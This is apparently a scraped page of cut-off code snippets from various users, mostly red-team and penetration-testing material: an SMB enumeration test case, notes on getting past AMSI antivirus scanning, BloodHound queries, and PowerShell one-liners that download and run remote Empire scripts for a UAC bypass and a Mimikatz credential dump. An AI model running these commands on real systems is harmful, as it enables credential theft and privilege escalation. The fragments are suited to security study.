thoran

Ultimate Resource List

• CLI Tools
• GUI Tools
• Web Tools
• Systems/Services
• Networks
• Containers/Orchestration
• Manuals/Howtos/Tutorials

gwhite-so

[[testCases]]
id = "1.0.0"
name = '1.0.0 - Enumerate SMB Sessions from Third-Party Utility On Disk (NetSess)'
description = "Using the third party NetSess.exe utility to enumerate active SMB sessions"
tooling.name = "NetSess.exe"
tooling.references = [
    "http://www.joeware.net/freetools/tools/netsess/"
]
executionSteps = [
    'agent> upload -File NetSess.exe',

Dviros

@echo off
echo Creating new theme file...
copy "C:\Windows\Resources\Themes\aero.theme" "C:\Windows\Resources\Themes\aero-dark.theme"
echo Modifying theme file...
powershell -Command "(gc C:\Windows\Resources\Themes\aero-dark.theme) -replace 'DisplayName=Aero', 'DisplayName=Aero Dark' | Out-File C:\Windows\Resources\Themes\aero-dark.theme"
echo Applying theme...
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v AppsUseLightTheme /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Themes\Personalize" /v SystemUsesLightTheme /t REG_DWORD /d 0 /f
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Themes\CurrentTheme" /v "Default" /d "C:\Windows\Resources\Themes\aero-dark.theme" /f
powershell -Command "get-Process -Name explorer | Stop-Process"

z0rs

Red Teaming tool

• General usefull Powershell Scripts
• AMSI Bypass restriction Bypass
• Payload Hosting
• Network Share Scanner
• Lateral Movement
• Reverse Shellz
• POST Exploitation

D3Ext

AMSI Bypass

To perform all this techniques you can simply try them by typing "Invoke-Mimikatz" into your powershell terminal, you'll notice that even if you haven't imported Mimikatz it will detect that as malicious. But if the AMSI is off or you avoid it, it just will say that "it's not recognized as the name of a cmdlet", so you could say that you've bypassed the AMSI

However some methods may be detected by the AV but most of them actually work without problem

Powershell downgrade

The first and worst way to bypass AMSI is downgrading powershell version to 2.0.

yezz123

Pentesting-Exploitation

Pentesting-Exploitation Programs and Commands , Protocols Network / Ports

Table of Contents

• Table of Contents
• Recon
  • File enumeration
• Disk files

Gydo194

; print all command line arguments (5 characters) and exit
; for 64-bit systems, Linux syscalls
; for simplicity, this program does not calculate the length of the strings.
; assemble with: nasm -f elf64 -o args args.asm
; link with: ld -o args args.o

sys_write	equ	1		; the linux WRITE syscall
sys_exit	equ	60		; the linux EXIT syscall
sys_stdout	equ	1		; the file descriptor for standard output (to print/write to)

bradtraversy

MongoDB Cheat Sheet

Show All Databases

show dbs

Show Current Database

seajaysec

{
    "queries": [{
            "name": "List all owned users",
            "queryList": [{
                "final": true,
                "query": "MATCH (m:User) WHERE m.owned=TRUE RETURN m"
            }]
        },
        {
            "name": "List all owned computers",

jivoi

# Description: 
#    Collection of PowerShell one-liners for red teamers and penetration testers to use at various stages of testing.

# Invoke-BypassUAC and start PowerShell prompt as Administrator [Or replace to run any other command]
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/privesc/Invoke-BypassUAC.ps1');Invoke-BypassUAC -Command 'start powershell.exe'"

# Invoke-Mimikatz: Dump credentials from memory
powershell.exe -exec bypass -C "IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1');Invoke-Mimikatz -DumpCreds"

# Import Mimikatz Module to run further commands